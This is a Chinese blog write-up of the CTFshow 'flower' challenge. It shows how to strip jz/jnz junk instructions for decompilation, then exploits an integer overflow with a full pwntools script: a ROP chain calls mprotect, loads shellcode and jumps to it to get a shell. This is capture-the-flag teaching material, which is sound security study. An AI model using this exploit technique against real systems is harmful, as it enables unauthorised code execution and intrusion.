CTFshow 内部赛 flower RE+PWN

已于 2024-08-27 17:14:42 修改
阅读量303 收藏 7
点赞数 9
文章标签: 安全
于 2024-08-27 17:12:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79252433/article/details/141605884
版权

re是时候该学学了,不能只局限于pwn啊,搞二进制的,逆向是最重要的基本功。

不得不说,内部赛这三题都不是善茬,第一题考ret2csu,第二题考MIPS架构下栈溢出,这第三题直接就re和pwn合体了。。。

首先映入眼帘的是main函数,但奇怪的是’F5大法’貌似失效了(按键已经按烂了),失效就算了还没给任何报错提示。。。虽然之前也遇到过这种情况,但报错信息显示是因为某处指令为call了一个寄存器,ida无法反汇编出来,这种题一般属于ret2shellcode的题。那现在我们只好一步步分析汇编代码,这里scanf后跳转到了一个地方(奇怪,这个jz和jnz就挺莫名其妙的),继续跟进

这里先做了个判断,如果之前scanf的值大于0xA则程序终止,反之根据那个值来read。我在没意识到这是个花指令题之前,以为是一道纯读汇编代码的题,直觉告诉我%d意味着这可能要用到整数溢出,但我证明不出来,遂罢。

现在让我们再回到那个奇怪的jz和jnz那里,这其实相当于一个jmp,但是如果直接用jmp的话,反编译器其实是能识别出这一种最简单的花指令的。这个花指令对应的结构如下:

asm
{
  jz Label
  jnz Label
  db thunkcode;垃圾数据
Label:
}

于是我们把这一段花指令给nop掉,这样main函数的执行逻辑就干净多了

但nop之后,发现还是不能‘F5大法’,这是为什么呢?原因在于左侧function栏ida不认为main函数存在,所以无法反汇编这一段区域

这里我们只要改sub_400A30的start address为main函数的起始地址0x4009AE即可,也可以顺便把name也改为main,之后就能惊奇的发现,左边text段标识变黑色了,可以反汇编了

可以看到scanf是%d,比较时是int,但v17的数据类型却是unsigned int,后面的read也是unsigned int,这就出现了整数溢出问题。在开始构造payload之前,要说明这个文件是静态编译的,无法进行ret2libc,但同时也给我们提供了大量的ROPgadget。进过寻找,没有发现system函数,于是只能ret2shellcode来进行系统调用了,不过未发现可执行可写入程序段,那该怎么办呢,这时拿出一个利器,mprotect函数,原型如下:

int mprotect(void *addr, size_t len, int prot);

addr 内存启始地址

len  修改内存的长度

prot 内存的权限

注意:起始地址(addr)必须为一个内存页(4K)的起始地址(地址后三位为000);prot设置为7,意为赋予可读可写可执行权限。

好的,现在假设我们已经mprotect完,并且已经向那个addr写入shellcode了,该怎么去执行它呢,这里我只想出了两种思路,1.栈迁移,2.ret2reg。我觉得2简单一些,就用2了。

这里ROPgadget搜call出来,发现寄存器应有尽有啊。

直接给出exp了,至于最后为什么选择了call rsi,可以好好想想哦:

from pwn import *
#io = process('./flower')
io = remote('pwn.challenge.ctf.show',28257)
elf = ELF('./flower')
context.arch = 'amd64'
context.log_level = 'debug'

io.sendlineafter(b'Plz Input Your weight(kg):\n> ',b'-1')

read = elf.symbols['read']
mprotect = elf.symbols['mprotect']
pop_rdi = 0x401696
pop_rdx_rsi = 0x442e69
bss = elf.get_section_by_name('.bss').header.sh_addr         #0x6CBB60
start = 0x6cb000
payload = cyclic(0x50+8) + p64(pop_rdi) + p64(start) + p64(pop_rdx_rsi) + p64(7) + p64(0x100) + p64(mprotect) #mprotect()
payload+= p64(pop_rdi) + p64(0) + p64(pop_rdx_rsi) + p64(0x100) + p64(start) + p64(read)                      #read()

call_rsi = 0x40e1e1
payload+= p64(call_rsi)

io.recvuntil(b'your name??\n> ')
io.sendline(payload)

shellcode = asm(shellcraft.sh())
io.sendline(shellcode)

io.interactive()

2301_79252433
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow 内部 pwn 签到题
SCP000111的博客
11-16 1676
ctfshow 内部 pwn 签到题 找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
PWN-PRACTICE-CTFSHOW-3
P1umH0的博客
01-13 600
PWN-PRACTICE-CTFSHOW-3pwn10萌新-签到题萌新-数学99内部-签到题 pwn10 格式化字符串漏洞,覆写num为16即可打印出flag # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1") #gdb.attach(io,"b * 0x0
ctfshow-内部-签到
XYH_233的博客
03-30 1354
ctfshow-内部-签到
ctfshow-内部
blowed的博客
03-09 4595
ctfshow 内部wp
ctfshow-内部-签到_ctfshow内部签到(1),网络安全面试试题
2401_84164527的博客
04-09 797
​ 有三个界面,login.phpuser.php,首先关注到的是,SQL语句,发现有两处可以看到通过email和password选出username,而,那么大概率从此处入手。
CTF训练之路2--ctfshow内部
unexpectedthing的博客
11-07 6712
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
【CTFshow】——PWN签到题
IronmanJay的博客
08-15 1019
PWN签到题-nc pwn.challenge.ctf.show 28171
CTFshow-pwn入门-前置基础pwn26-pwn28
T1ngSh0w的博客
06-20 986
CTFshow-pwn入门-pwn26-pwn28
CTFshow-pwn入门-前置基础pwn23-pwn25
T1ngSh0w的博客
06-19 1852
CTFshow-pwn入门-前置基础pwn23-pwn25
ctfshow pwn
zip471642048的博客
06-04 475
ctfshow pwn系列
CTF+pwn+nc(windows)+链接靶机
06-10
我们经常在打pwn的时候可能要用到我们的nc,一般我们要打开虚拟机,加入我们本机有一个nc就会方便很多
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3495
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
ctfshow 内部签到
08-28
- *2* *3* [ctfshow 内部 pwn 签到题](https://blog.csdn.net/SCP000111/article/details/121353677)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
如何使用双重IP代理实现更安全的网络访问
最新发布
IPIPGO的博客
08-26 448
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
探索安全领域的新星:哈希函数SHA3-512
zwa20110606的博客
08-23 1191
SHA3-512是美国国家标准与技术研究院(NIST)于2015年正式发布的第三代安全哈希算法。它是为了解决SHA-2系列算法存在的安全隐患而设计的,具有更高的安全性和灵活性。SHA3-512作为一种新型哈希函数,凭借其高安全性、灵活性和优越性能,在信息安全领域具有广泛的应用前景。随着加密技术的不断发展,相信SHA3-512将在未来为我国网络安全保驾护航。
第2章-05-接口API与安全签名算法
黑夜开发者的博客
08-24 184
API(Application Programming Interface,应用程序编程接口)接口是一种定义了软件应用程序之间通信方式的协议或规范。它允许不同的软件应用程序之间进行数据交换和功能调用,而无需了解对方内部的具体实现细节。简而言之,API接口是软件之间的桥梁,使得不同的系统或服务能够相互连接和交互。
智能叮咚门铃的功能,开启未来家居安全新篇章
OCY868的博客
08-23 282
在科技日新月异的今天,智能家居产品正逐步渗透到我们生活的每一个角落,其中,智能叮咚门铃作为家庭安防与便捷生活的重要一环,正经历着前所未有的功能升级与变革。
安全架构设计
wangbuji的博客
08-22 496
系统安全架构设计,主要包含:物理安全,网络安全,系统安全,数据安全,应用安全。完整性(Integrity)是指要防止系统的数据和资源在未经授权情况下被修改;机密性 (Confidentiality)是指要防止系统的数据和资源在未授权的情况下被披露。安全架构需求分析主要包括以下几个方面:明确系统安全的最终目标,例如保护用户隐私、防止未授权访问等。根据系统的功能和业务特点,划分出不同层次的安全需求,并给予相应的优先级。对系统可能面临的安全威胁进行详细的分析和识别,包括外部攻击、内部员工策反等。
【宝马中国-注册/登录安全分析报告】
08-26 1117
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值